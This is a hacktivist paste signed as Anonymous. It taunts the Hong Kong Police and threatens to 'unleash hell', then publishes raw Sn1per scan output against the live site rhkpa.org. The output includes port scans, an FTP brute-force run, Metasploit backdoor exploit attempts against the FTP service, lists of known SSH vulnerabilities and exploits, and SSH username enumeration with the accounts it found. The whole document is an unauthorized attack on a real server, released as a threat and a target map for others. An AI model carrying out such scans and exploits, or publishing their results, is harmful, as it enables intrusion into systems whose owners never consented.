Oct 02, 2019, 03:08 PM
Greetings Hong Kong Police!

We are
 _ _
 _| || |_ /\
|_ __ _| / \ _ __ ___ _ __ _ _ _ __ ___ ___ _ _ ___
 _| || |_ / /\ \ | '_ \ / _ \| '_ \| | | | '_ ` _ \ / _ \| | | / __|
|_ __ _/ ____ \| | | | (_) | | | | |_| | | | | | | (_) | |_| \__ \
 |_||_|/_/ \_\_| |_|\___/|_| |_|\__, |_| |_| |_|\___/ \__,_|___/
 __/ |
 |___/

Your incessant violence against innocent protestors has caught our attention.

In short, today we would like to offer you a challenge! oo0XOX0oo

Before the better part of our collective decides to unleash hell upon this server,

and many others, (after seeing a multitude of vulnerabilities)

we would like to invite you to begin deploying security patches to circumvent our attempts to exploit them.

Therefore below we have provided you with a free and complimentary security audit!

We knew you would be pleased. lulz



We do not forgive
We do not forget
Expect us!

Tick,
 Tock

Good Luck!

 ____
 _________ / _/___ ___ _____
 / ___/ __ \ / // __ \/ _ \/ ___/
 (__ ) / / // // /_/ / __/ /
 /____/_/ /_/___/ .___/\___/_/
 /_/

 + -- --=[https://xerosecurity.com
 + -- --=[Sn1per v7.2 by @xer0dayz

====================================================================================
 GATHERING DNS INFO
====================================================================================

dnsenum VERSION:1.2.4

----- www.rhkpa.org -----


Host's addresses:
__________________

rhkpa.org. 14398 IN A 216.172.168.193


Name Servers:
______________

ns1.bluehost.com. 3600 IN A 162.159.24.80
ns2.bluehost.com. 3600 IN A 162.159.25.175


Mail (MX) Servers:
___________________

rhkpa-org.mail.protection.outlook.com. 3600 IN A 104.47.20.36
rhkpa-org.mail.protection.outlook.com. 3600 IN A 104.47.21.36


Trying Zone Transfers and getting Bind Versions:
_________________________________________________


Trying Zone Transfer for www.rhkpa.org on ns1.bluehost.com ...

Trying Zone Transfer for www.rhkpa.org on ns2.bluehost.com ...

brute force file not specified, bay.
====================================================================================
 CHECKING FOR SUBDOMAIN HIJACKING
====================================================================================

====================================================================================
 PINGING HOST
====================================================================================

====================================================================================
 RUNNING TCP PORT SCAN
====================================================================================
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-02 12:53 UTC
Nmap scan report for www.rhkpa.org (216.172.168.193)
Host is up (0.11s latency).
rDNS record for 216.172.168.193: box6011.bluehost.com
Not shown: 469 filtered ports, 1 closed port
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
53/tcp   open  domain
80/tcp   open  http
110/tcp  open  pop3
143/tcp  open  imap
443/tcp  open  https
465/tcp  open  smtps
587/tcp  open  submission
993/tcp  open  imaps
995/tcp  open  pop3s
8080/tcp open  http-proxy
8443/tcp open  https-alt

Nmap done: 1 IP address (1 host up) scanned in 6.42 seconds
====================================================================================
 RUNNING UDP PORT SCAN
====================================================================================
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-02 12:53 UTC
Nmap scan report for www.rhkpa.org (216.172.168.193)
Host is up (0.084s latency).
rDNS record for 216.172.168.193: box6011.bluehost.com

PORT     STATE         SERVICE
53/udp   open          domain
67/udp   open|filtered dhcps
68/udp   open|filtered dhcpc
69/udp   open|filtered tftp
88/udp   open|filtered kerberos-sec
123/udp  open|filtered ntp
137/udp  open|filtered netbios-ns
138/udp  open|filtered netbios-dgm
139/udp  open|filtered netbios-ssn
161/udp  open|filtered snmp
162/udp  open|filtered snmptrap
389/udp  open|filtered ldap
500/udp  open|filtered isakmp
520/udp  open|filtered route
2049/udp open|filtered nfs

Nmap done: 1 IP address (1 host up) scanned in 3.28 seconds

====================================================================================
 RUNNING INTRUSIVE SCANS
====================================================================================
 + -- --=[Port 21 opened... running tests...
====================================================================================
 RUNNING NMAP SCRIPTS
====================================================================================
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-02 12:53 UTC
NSE: [ftp-brute] usernames: Time limit 3m00s exceeded.
NSE: [ftp-brute] usernames: Time limit 3m00s exceeded.
NSE: [ftp-brute] passwords: Time limit 3m00s exceeded.
Nmap scan report for www.rhkpa.org (216.172.168.193)
Host is up (0.13s latency).
rDNS record for 216.172.168.193: box6011.bluehost.com

PORT   STATE SERVICE VERSION
21/tcp open  ftp     Pure-FTPd
| ftp-brute:
| Accounts: No valid accounts found
|_ Statistics: Performed 4123 guesses in 184 seconds, average tps: 20.1
| vulscan: VulDB - https://vuldb.com:
| [102925] Foscam C1 Indoor HD Camera 2.52.2.37 Web Management Interface pureftpd.passwd HTTP Request privilege escalation
| [57510] Pureftpd Pure-FTPd up to 0.x Memory Consumption denial of service
| [57504] Pureftpd Pure-FTPd up to 0.x ftp_parser.c Cleartext unknown vulnerability
|
| MITRE CVE - https://cve.mitre.org:
| [CVE-2004-0656] The accept_client function in PureFTPd 1.0.18 and earlier allows remote attackers to cause a denial of service by exceeding the maximum number of connections.
|
| SecurityFocus - https://www.securityfocus.com/bid/:
| [10664] PureFTPd Accept_Client Remote Denial of Service Vulnerability
|
| IBM X-Force - https://exchange.xforce.ibmcloud.com:
| No findings
|
| Exploit-DB - https://www.exploit-db.com:
| No findings
|
| OpenVAS (Nessus) - http://www.openvas.org:
| No findings
|
| SecurityTracker - https://www.securitytracker.com:
| [1010701] PureFTPd Logic Bug in accept_client() Lets Remote Users Crash the FTP Daemon
| [1008135] (Claim is Retracted) PureFTPd Buffer Overflow in displayrate() Lets Remote Users Crash the Service
| [1002993] PurePostPro Script Add-on for PureFTPd and MySQL Allows Remote Users to Execute SQL Commands on the Server
| [1001126] PureFTPd May Allow Remote Users to Deny Service on the Server
|
| OSVDB - http://www.osvdb.org:
| No findings
|_
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 3.12 (98%), Linux 4.4 (98%), Linux 4.9 (98%), Linux 3.18 (98%), Linux 2.6.32 (97%), Linux 2.6.32 or 3.10 (97%), Linux 2.6.35 (97%), Linux 2.6.39 (97%), Linux 3.5 (97%), Linux 3.7 (97%)
No exact OS matches for host (test conditions non-ideal).

TRACEROUTE
HOP RTT       ADDRESS
1   129.74 ms box6011.bluehost.com (216.172.168.193)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 194.08 seconds
====================================================================================
 RUNNING METASPLOIT FTP VERSION SCANNER
====================================================================================
[-] ***
[-] * WARNING: No database support: could not connect to server: Connection refused
 Is the server running on host "localhost" (::1) and accepting
 TCP/IP connections on port 5432?
could not connect to server: Connection refused
 Is the server running on host "localhost" (127.0.0.1) and accepting
 TCP/IP connections on port 5432?

[-] ***
RHOST => www.rhkpa.org
RHOSTS => www.rhkpa.org
[+] 216.172.168.193:21 - FTP Banner: '220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------\x0d\x0a220-You are user number 6 of 1000 allowed.\x0d\x0a220-Local time is now 06:57. Server port: 21.\x0d\x0a220-This is a private system - No anonymous login\x0d\x0a220-IPv6 connections are also welcome on this server.\x0d\x0a220 You will be disconnected after 15 minutes of inactivity.\x0d\x0a'
[*] www.rhkpa.org:21 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
====================================================================================
 RUNNING METASPLOIT ANONYMOUS FTP SCANNER
====================================================================================
RHOST => www.rhkpa.org
RHOSTS => www.rhkpa.org
[*] www.rhkpa.org:21 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
====================================================================================
 RUNNING VSFTPD 2.3.4 BACKDOOR EXPLOIT
====================================================================================
RHOST => www.rhkpa.org
RHOSTS => www.rhkpa.org
LHOST => 127.0.0.1
LPORT => 4444
[*] 216.172.168.193:21 - Banner: 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
220-You are user number 5 of 1000 allowed.
220-Local time is now 06:59. Server port: 21.
220-This is a private system - No anonymous login
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.
[*] 216.172.168.193:21 - USER: 331 User O:) OK. Password required
[*] Exploit completed, but no session was created.
====================================================================================
 RUNNING PROFTPD 1.3.3C BACKDOOR EXPLOIT
====================================================================================
RHOST => www.rhkpa.org
RHOSTS => www.rhkpa.org
LHOST => 127.0.0.1
LPORT => 4444
[*] Started reverse TCP double handler on 10.89.0.94:4444
[*] 216.172.168.193:21 - Sending Backdoor Command
[*] Exploit completed, but no session was created.
 + -- --=[Port 22 opened... running tests...
====================================================================================
 RUNNING SSH AUDIT
====================================================================================
# general
(gen) banner: SSH-2.0-OpenSSH_5.3
(gen) software: OpenSSH 5.3
(gen) compatibility: OpenSSH 5.9-6.6, Dropbear SSH 2013.56+
(gen) compression: enabled (zlib@openssh.com)

# key exchange algorithms
(kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak)
                                           `- [info] available since OpenSSH 4.4

# host-key algorithms
(key) ssh-rsa -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
(key) ssh-dss -- [fail] removed (in server) and disabled (in client) since OpenSSH 7.0, weak algorithm
              `- [warn] using small 1024-bit modulus
              `- [warn] using weak random number generator could reveal the key
              `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28

# encryption algorithms (ciphers)
(enc) aes256-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
(enc) aes192-ctr -- [info] available since OpenSSH 3.7
(enc) aes128-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52

# message authentication code algorithms
(mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode
                    `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
(mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode
                    `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
(mac) hmac-ripemd160 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
                     `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
                     `- [warn] using encrypt-and-MAC mode
                     `- [info] available since OpenSSH 2.5.0
(mac) hmac-ripemd160@openssh.com -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
                                 `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
                                 `- [warn] using encrypt-and-MAC mode
                                 `- [info] available since OpenSSH 2.1.0

# algorithm recommendations (for OpenSSH 5.3)
(rec) -ssh-dss -- key algorithm to remove
(rec) -hmac-ripemd160 -- mac algorithm to remove
(rec) -hmac-ripemd160@openssh.com -- mac algorithm to remove

====================================================================================
 RUNNING NMAP SCRIPTS
====================================================================================
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-02 13:00 UTC
Nmap scan report for www.rhkpa.org (216.172.168.193)
Host is up (0.13s latency).
rDNS record for 216.172.168.193: box6011.bluehost.com

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.3 (protocol 2.0)
|_ssh-auth-methods: ERROR: Script execution failed (use -d to debug)
|_ssh-brute: ERROR: Script execution failed (use -d to debug)
|_ssh-publickey-acceptance: ERROR: Script execution failed (use -d to debug)
|_ssh-run: ERROR: Script execution failed (use -d to debug)
| vulners:
| cpe:/a:openbsd:openssh:5.3:
| CVE-2014-1692 7.5 https://vulners.com/cve/CVE-2014-1692
| CVE-2010-4478 7.5 https://vulners.com/cve/CVE-2010-4478
| CVE-2017-15906 5.0 https://vulners.com/cve/CVE-2017-15906
| CVE-2016-10708 5.0 https://vulners.com/cve/CVE-2016-10708
| CVE-2010-5107 5.0 https://vulners.com/cve/CVE-2010-5107
| CVE-2016-0777 4.0 https://vulners.com/cve/CVE-2016-0777
| CVE-2010-4755 4.0 https://vulners.com/cve/CVE-2010-4755
| CVE-2012-0814 3.5 https://vulners.com/cve/CVE-2012-0814
| CVE-2011-5000 3.5 https://vulners.com/cve/CVE-2011-5000
|_ CVE-2011-4327 2.1 https://vulners.com/cve/CVE-2011-4327
| vulscan: VulDB - https://vuldb.com:
| [80267] OpenSSH up to 5.x/6.x/7.1p1 Forward Option roaming_common.c roaming_read/roaming_write memory corruption
| [80266] OpenSSH up to 5.x/6.x/7.1p1 roaming_common.c resend_bytes information disclosure
| [4584] OpenSSH up to 5.7 auth-options.c information disclosure
| [4282] OpenSSH 5.6/5.7 Legacy Certificate memory corruption
|
| MITRE CVE - https://cve.mitre.org:
| [CVE-2006-0883] OpenSSH on FreeBSD 5.3 and 5.4, when used with OpenPAM, does not properly handle when a forked child process terminates during PAM authentication, which allows remote attackers to cause a denial of service (client connection refusal) by connecting multiple times to the SSH server, waiting for the password prompt, then disconnecting.
| [CVE-2012-0814] The auth_parse_options function in auth-options.c in sshd in OpenSSH before 5.7 provides debug messages containing authorized_keys command options, which allows remote authenticated users to obtain potentially sensitive information by reading these messages, as demonstrated by the shared user account required by Gitolite. NOTE: this can cross privilege boundaries because a user account may intentionally have no shell or filesystem access, and therefore may have no supported way to read an authorized_keys file in its own home directory.
| [CVE-2011-5000] The ssh_gssapi_parse_ename function in gss-serv.c in OpenSSH 5.8 and earlier, when gssapi-with-mic authentication is enabled, allows remote authenticated users to cause a denial of service (memory consumption) via a large value in a certain length field. NOTE: there may be limited scenarios in which this issue is relevant.
| [CVE-2011-0539] The key_certify function in usr.bin/ssh/key.c in OpenSSH 5.6 and 5.7, when generating legacy certificates using the -t command-line option in ssh-keygen, does not initialize the nonce field, which might allow remote attackers to obtain sensitive stack memory contents or make it easier to conduct hash collision attacks.
| [CVE-2010-4755] The (1) remote_glob function in sftp-glob.c and the (2) process_put function in sftp.c in OpenSSH 5.8 and earlier, as used in FreeBSD 7.3 and 8.1, NetBSD 5.0.2, OpenBSD 4.7, and other products, allow remote authenticated users to cause a denial of service (CPU and memory consumption) via crafted glob expressions that do not match any pathnames, as demonstrated by glob expressions in SSH_FXP_STAT requests to an sftp daemon, a different vulnerability than CVE-2010-2632.
| [CVE-2010-4478] OpenSSH 5.6 and earlier, when J-PAKE is enabled, does not properly validate the public parameters in the J-PAKE protocol, which allows remote attackers to bypass the need for knowledge of the shared secret, and successfully authenticate, by sending crafted values in each round of the protocol, a related issue to CVE-2010-4252.
| [CVE-2009-2904] A certain Red Hat modification to the ChrootDirectory feature in OpenSSH 4.8, as used in sshd in OpenSSH 4.3 in Red Hat Enterprise Linux (RHEL) 5.4 and Fedora 11, allows local users to gain privileges via hard links to setuid programs that use configuration files within the chroot directory, related to requirements for directory ownership.
| [CVE-2008-3844] Certain Red Hat Enterprise Linux (RHEL) 4 and 5 packages for OpenSSH, as signed in August 2008 using a legitimate Red Hat GPG key, contain an externally introduced modification (Trojan Horse) that allows the package authors to have an unknown impact. NOTE: since the malicious packages were not distributed from any official Red Hat sources, the scope of this issue is restricted to users who may have obtained these packages through unofficial distribution points. As of 20080827, no unofficial distributions of this software are known.
| [CVE-2008-3259] OpenSSH before 5.1 sets the SO_REUSEADDR socket option when the X11UseLocalhost configuration setting is disabled, which allows local users on some platforms to hijack the X11 forwarding port via a bind to a single IP address, as demonstrated on the HP-UX platform.
|
| SecurityFocus - https://www.securityfocus.com/bid/:
| [102780] OpenSSH CVE-2016-10708 Multiple Denial of Service Vulnerabilities
| [101552] OpenSSH 'sftp-server.c' Remote Security Bypass Vulnerability
| [94977] OpenSSH CVE-2016-10011 Local Information Disclosure Vulnerability
| [94975] OpenSSH CVE-2016-10012 Security Bypass Vulnerability
| [94972] OpenSSH CVE-2016-10010 Privilege Escalation Vulnerability
| [94968] OpenSSH CVE-2016-10009 Remote Code Execution Vulnerability
| [93776] OpenSSH 'ssh/kex.c' Denial of Service Vulnerability
| [92212] OpenSSH CVE-2016-6515 Denial of Service Vulnerability
| [92210] OpenSSH CBC Padding Weak Encryption Security Weakness
| [92209] OpenSSH MAC Verification Security Bypass Vulnerability
| [91812] OpenSSH CVE-2016-6210 User Enumeration Vulnerability
| [90440] OpenSSH CVE-2004-1653 Remote Security Vulnerability
| [90340] OpenSSH CVE-2004-2760 Remote Security Vulnerability
| [89385] OpenSSH CVE-2005-2666 Local Security Vulnerability
| [88655] OpenSSH CVE-2001-1382 Remote Security Vulnerability
| [88513] OpenSSH CVE-2000-0999 Remote Security Vulnerability
| [88367] OpenSSH CVE-1999-1010 Local Security Vulnerability
| [87789] OpenSSH CVE-2003-0682 Remote Security Vulnerability
| [86187] OpenSSH 'session.c' Local Security Bypass Vulnerability
| [86144] OpenSSH CVE-2007-2768 Remote Security Vulnerability
| [84427] OpenSSH CVE-2016-1908 Security Bypass Vulnerability
| [84314] OpenSSH CVE-2016-3115 Remote Command Injection Vulnerability
| [84185] OpenSSH CVE-2006-4925 Denial-Of-Service Vulnerability
| [81293] OpenSSH CVE-2016-1907 Denial of Service Vulnerability
| [80698] OpenSSH CVE-2016-0778 Heap Based Buffer Overflow Vulnerability
| [80695] OpenSSH CVE-2016-0777 Information Disclosure Vulnerability
| [76497] OpenSSH CVE-2015-6565 Local Security Bypass Vulnerability
| [76317] OpenSSH PAM Support Multiple Remote Code Execution Vulnerabilities
| [75990] OpenSSH Login Handling Security Bypass Weakness
| [75525] OpenSSH 'x11_open_helper()' Function Security Bypass Vulnerability
| [71420] Portable OpenSSH 'gss-serv-krb5.c' Security Bypass Vulnerability
| [68757] OpenSSH Multiple Remote Denial of Service Vulnerabilities
| [66459] OpenSSH Certificate Validation Security Bypass Vulnerability
| [66355] OpenSSH 'child_set_env()' Function Security Bypass Vulnerability
| [65674] OpenSSH 'ssh-keysign.c' Local Information Disclosure Vulnerability
| [65230] OpenSSH 'schnorr.c' Remote Memory Corruption Vulnerability
| [63605] OpenSSH 'sshd' Process Remote Memory Corruption Vulnerability
| [61286] OpenSSH Remote Denial of Service Vulnerability
| [58894] GSI-OpenSSH PAM_USER Security Bypass Vulnerability
| [58162] OpenSSH CVE-2010-5107 Denial of Service Vulnerability
| [54114] OpenSSH 'ssh_gssapi_parse_ename()' Function Denial of Service Vulnerability
| [51702] Debian openssh-server Forced Command Handling Information Disclosure Vulnerability
| [50416] Linux Kernel 'kdump' and 'mkdumprd' OpenSSH Integration Remote Information Disclosure Vulnerability
| [49473] OpenSSH Ciphersuite Specification Information Disclosure Weakness
| [48507] OpenSSH 'pam_thread()' Remote Buffer Overflow Vulnerability
| [47691] Portable OpenSSH 'ssh-keysign' Local Unauthorized Access Vulnerability
| [46155] OpenSSH Legacy Certificate Signing Information Disclosure Vulnerability
| [45304] OpenSSH J-PAKE Security Bypass Vulnerability
| [36552] Red Hat Enterprise Linux OpenSSH 'ChrootDirectory' Option Local Privilege Escalation Vulnerability
| [32319] OpenSSH CBC Mode Information Disclosure Vulnerability
| [30794] Red Hat OpenSSH Backdoor Vulnerability
| [30339] OpenSSH 'X11UseLocalhost' X11 Forwarding Session Hijacking Vulnerability
| [30276] Debian OpenSSH SELinux Privilege Escalation Vulnerability
| [28531] OpenSSH ForceCommand Command Execution Weakness
| [28444] OpenSSH X Connections Session Hijacking Vulnerability
| [26097] OpenSSH LINUX_AUDIT_RECORD_EVENT Remote Log Injection Weakness
| [25628] OpenSSH X11 Cookie Local Authentication Bypass Vulnerability
| [23601] OpenSSH S/Key Remote Information Disclosure Vulnerability
| [20956] OpenSSH Privilege Separation Key Signature Weakness
| [20418] OpenSSH-Portable Existing Password Remote Information Disclosure Weakness
| [20245] OpenSSH-Portable GSSAPI Authentication Abort Information Disclosure Weakness
| [20241] Portable OpenSSH GSSAPI Remote Code Execution Vulnerability
| [20216] OpenSSH Duplicated Block Remote Denial of Service Vulnerability
| [16892] OpenSSH Remote PAM Denial Of Service Vulnerability
| [14963] OpenSSH LoginGraceTime Remote Denial Of Service Vulnerability
| [14729] OpenSSH GSSAPI Credential Disclosure Vulnerability
| [14727] OpenSSH DynamicForward Inadvertent GatewayPorts Activation Vulnerability
| [11781] OpenSSH-portable PAM Authentication Remote Information Disclosure Vulnerability
| [9986] RCP, OpenSSH SCP Client File Corruption Vulnerability
| [9040] OpenSSH PAM Conversation Memory Scrubbing Weakness
| [8677] Multiple Portable OpenSSH PAM Vulnerabilities
| [8628] OpenSSH Buffer Mismanagement Vulnerabilities
| [7831] OpenSSH Reverse DNS Lookup Access Control Bypass Vulnerability
| [7482] OpenSSH Remote Root Authentication Timing Side-Channel Weakness
| [7467] OpenSSH-portable Enabled PAM Delay Information Disclosure Vulnerability
| [7343] OpenSSH Authentication Execution Path Timing Information Leakage Weakness
| [6168] OpenSSH Visible Password Vulnerability
| [5374] OpenSSH Trojan Horse Vulnerability
| [5093] OpenSSH Challenge-Response Buffer Overflow Vulnerabilities
| [4560] OpenSSH Kerberos 4 TGT/AFS Token Buffer Overflow Vulnerability
| [4241] OpenSSH Channel Code Off-By-One Vulnerability
| [3614] OpenSSH UseLogin Environment Variable Passing Vulnerability
| [3560] OpenSSH Kerberos Arbitrary Privilege Elevation Vulnerability
| [3369] OpenSSH Key Based Source IP Access Control Bypass Vulnerability
| [3345] OpenSSH SFTP Command Restriction Bypassing Vulnerability
| [2917] OpenSSH PAM Session Evasion Vulnerability
| [2825] OpenSSH Client X11 Forwarding Cookie Removal File Symbolic Link Vulnerability
| [2356] OpenSSH Private Key Authentication Check Vulnerability
| [1949] OpenSSH Client Unauthorized Remote Forwarding Vulnerability
| [1334] OpenSSH UseLogin Vulnerability
|
| IBM X-Force - https://exchange.xforce.ibmcloud.com:
| [83258] GSI-OpenSSH auth-pam.c security bypass
| [82781] OpenSSH time limit denial of service
| [82231] OpenSSH pam_ssh_agent_auth PAM code execution
| [74809] OpenSSH ssh_gssapi_parse_ename denial of service
| [72756] Debian openssh-server commands information disclosure
| [68339] OpenSSH pam_thread buffer overflow
| [67264] OpenSSH ssh-keysign unauthorized access
| [65910] OpenSSH remote_glob function denial of service
| [65163] OpenSSH certificate information disclosure
| [64387] OpenSSH J-PAKE security bypass
| [63337] Cisco Unified Videoconferencing OpenSSH weak security
| [46620] OpenSSH and multiple SSH Tectia products CBC mode information disclosure
| [45202] OpenSSH signal handler denial of service
| [44747] RHEL OpenSSH backdoor
| [44280] OpenSSH PermitRootLogin information disclosure
| [44279] OpenSSH sshd weak security
| [44037] OpenSSH sshd SELinux role unauthorized access
| [43940] OpenSSH X11 forwarding information disclosure
| [41549] OpenSSH ForceCommand directive security bypass
| [41438] OpenSSH sshd session hijacking
| [40897] OpenSSH known_hosts weak security
| [40587] OpenSSH username weak security
| [37371] OpenSSH username data manipulation
| [37118] RHSA update for OpenSSH privilege separation monitor authentication verification weakness not installed
| [37112] RHSA update for OpenSSH signal handler race condition not installed
| [37107] RHSA update for OpenSSH identical block denial of service not installed
| [36637] OpenSSH X11 cookie privilege escalation
| [35167] OpenSSH packet.c newkeys[mode] denial of service
| [34490] OpenSSH OPIE information disclosure
| [33794] OpenSSH ChallengeResponseAuthentication information disclosure
| [32975] Apple Mac OS X OpenSSH denial of service
| [32387] RHSA-2006:0738 updates for openssh not installed
| [32359] RHSA-2006:0697 updates for openssh not installed
| [32230] RHSA-2006:0298 updates for openssh not installed
| [32132] RHSA-2006:0044 updates for openssh not installed
| [30120] OpenSSH privilege separation monitor authentication verification weakness
| [29255] OpenSSH GSSAPI user enumeration
| [29254] OpenSSH signal handler race condition
| [29158] OpenSSH identical block denial of service
| [28147] Apple Mac OS X OpenSSH nonexistent user login denial of service
| [25116] OpenSSH OpenPAM denial of service
| [24305] OpenSSH SCP shell expansion command execution
| [22665] RHSA-2005:106 updates for openssh not installed
| [22117] OpenSSH GSSAPI allows elevated privileges
| [22115] OpenSSH GatewayPorts security bypass
| [20930] OpenSSH sshd.c LoginGraceTime denial of service
| [19441] Sun Solaris OpenSSH LDAP (1) client authentication denial of service
| [17213] OpenSSH allows port bouncing attacks
| [16323] OpenSSH scp file overwrite
| [13797] OpenSSH PAM information leak
| [13271] OpenSSH could allow an attacker to corrupt the PAM conversion stack
| [13264] OpenSSH PAM code could allow an attacker to gain access
| [13215] OpenSSH buffer management errors could allow an attacker to execute code
| [13214] OpenSSH memory vulnerabilities
| [13191] OpenSSH large packet buffer overflow
| [12196] OpenSSH could allow an attacker to bypass login restrictions
| [11970] OpenSSH could allow an attacker to obtain valid administrative account
| [11902] OpenSSH PAM support enabled information leak
| [9803] OpenSSH "
| [9763] OpenSSH downloaded from the OpenBSD FTP site or OpenBSD FTP mirror sites could contain a Trojan Horse
| [9307] OpenSSH is running on the system
| [9169] OpenSSH "
| [8896] OpenSSH Kerberos 4 TGT/AFS buffer overflow
| [8697] FreeBSD libutil in OpenSSH fails to drop privileges prior to using the login class capability database
| [8383] OpenSSH off-by-one error in channel code
| [7647] OpenSSH UseLogin option arbitrary code execution
| [7634] OpenSSH using sftp and restricted keypairs could allow an attacker to bypass restrictions
| [7598] OpenSSH with Kerberos allows attacker to gain elevated privileges
| [7179] OpenSSH source IP access control bypass
| [6757] OpenSSH "
| [6676] OpenSSH X11 forwarding symlink attack could allow deletion of arbitrary files
| [6084] OpenSSH 2.3.1 allows remote users to bypass authentication
| [5517] OpenSSH allows unauthorized access to resources
| [4646] OpenSSH UseLogin option allows remote users to execute commands as root
|
| Exploit-DB - https://www.exploit-db.com:
| [21579] OpenSSH 3.x Challenge-Response Buffer Overflow Vulnerabilities (2)
| [21578] OpenSSH 3.x Challenge-Response Buffer Overflow Vulnerabilities (1)
| [21402] OpenSSH 2.x/3.x Kerberos 4 TGT/AFS Token Buffer Overflow Vulnerability
| [21314] OpenSSH 2.x/3.0.1/3.0.2 Channel Code Off-By-One Vulnerability
| [20253] OpenSSH 1.2 scp File Create/Overwrite Vulnerability
| [17462] FreeBSD OpenSSH 3.5p1 - Remote Root Exploit
| [14866] Novell Netware 6.5 - OpenSSH Remote Stack Overflow
| [6094] Debian OpenSSH Remote SELinux Privilege Elevation Exploit (auth)
| [3303] Portable OpenSSH <= 3.6.1p-PAM / 4.1-SUSE Timing Attack Exploit
| [2444] OpenSSH <= 4.3 p1 (Duplicated Block) Remote Denial of Service Exploit
| [1572] Dropbear / OpenSSH Server (MAX_UNAUTH_CLIENTS) Denial of Service
| [258] glibc-2.2 and openssh-2.3.0p1 exploits glibc => 2.1.9x
| [26] OpenSSH/PAM <= 3.6.1p1 Remote Users Ident (gossh.sh)
| [25] OpenSSH/PAM <= 3.6.1p1 Remote Users Discovery Tool
|
| OpenVAS (Nessus) - http://www.openvas.org:
|
| SecurityTracker - https://www.securitytracker.com:
|
| OSVDB - http://www.osvdb.org:
|_
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 3.12 (98%), Linux 4.4 (98%), Linux 4.9 (98%), Linux 3.18 (98%), Linux 2.6.32 (97%), Linux 2.6.32 or 3.10 (97%), Linux 2.6.35 (97%), Linux 2.6.39 (97%), Linux 3.7 (97%), Synology DiskStation Manager 5.1 (97%)
No exact OS matches for host (test conditions non-ideal).

TRACEROUTE
HOP RTT ADDRESS
1 130.47 ms box6011.bluehost.com (216.172.168.193)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.53 seconds
====================================================================================
 RUNNING SSH VERSION SCANNER
====================================================================================
[-] ***
[-] * WARNING: No database support: could not connect to server: Connection refused
 Is the server running on host "localhost" (::1) and accepting
 TCP/IP connections on port 5432?
could not connect to server: Connection refused
 Is the server running on host "localhost" (127.0.0.1) and accepting
 TCP/IP connections on port 5432?

[-] ***
USER_FILE => /usr/share/brutex/wordlists/simple-users.txt
RHOSTS => www.rhkpa.org
RHOST => www.rhkpa.org
[*] www.rhkpa.org:22 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
====================================================================================
 RUNNING OPENSSH USER ENUM SCANNER
====================================================================================
USER_FILE => /usr/share/brutex/wordlists/simple-users.txt
RHOSTS => www.rhkpa.org
RHOST => www.rhkpa.org
[*] 216.172.168.193:22 - SSH - Using malformed packet technique
[*] 216.172.168.193:22 - SSH - Starting scan
[+] 216.172.168.193:22 - SSH - User 'admin' found
[+] 216.172.168.193:22 - SSH - User 'administrator' found
[+] 216.172.168.193:22 - SSH - User 'anonymous' found
[+] 216.172.168.193:22 - SSH - User 'backup' found
[+] 216.172.168.193:22 - SSH - User 'bee' found
[+] 216.172.168.193:22 - SSH - User 'ftp' found
[+] 216.172.168.193:22 - SSH - User 'guest' found
[+] 216.172.168.193:22 - SSH - User 'GUEST' found
[+] 216.172.168.193:22 - SSH - User 'info' found
[-] 216.172.168.193:22 - SSH - User 'mail' on could not connect
[-] 216.172.168.193:22 - SSH - User 'mailadmin' on could not connect
[-] 216.172.168.193:22 - SSH - User 'msfadmin' on could not connect
[-] 216.172.168.193:22 - SSH - User 'mysql' on could not connect
[-] 216.172.168.193:22 - SSH - User 'nobody' on could not connect
[-] 216.172.168.193:22 - SSH - User 'oracle' on could not connect
[-] 216.172.168.193:22 - SSH - User 'owaspbwa' on could not connect
[-] 216.172.168.193:22 - SSH - User 'postfix' on could not connect
[-] 216.172.168.193:22 - SSH - User 'postgres' on could not connect
[-] 216.172.168.193:22 - SSH - User 'private' on could not connect
[-] 216.172.168.193:22 - SSH - User 'proftpd' on could not connect
[-] 216.172.168.193:22 - SSH - User 'public' on could not connect
[-] 216.172.168.193:22 - SSH - User 'root' on could not connect
[-] 216.172.168.193:22 - SSH - User 'superadmin' on could not connect
[-] 216.172.168.193:22 - SSH - User 'support' on could not connect
[-] 216.172.168.193:22 - SSH - User 'sys' on could not connect
[-] 216.172.168.193:22 - SSH - User 'system' on could not connect
[-] 216.172.168.193:22 - SSH - User 'systemadmin' on could not connect
[-] 216.172.168.193:22 - SSH - User 'systemadministrator' on could not connect
[-] 216.172.168.193:22 - SSH - User 'test' on could not connect
[-] 216.172.168.193:22 - SSH - User 'tomcat' on could not connect
[-] 216.172.168.193:22 - SSH - User 'user' on could not connect
[-] 216.172.168.193:22 - SSH - User 'webmaster' on could not connect
[-] 216.172.168.193:22 - SSH - User 'www-data' on could not connect
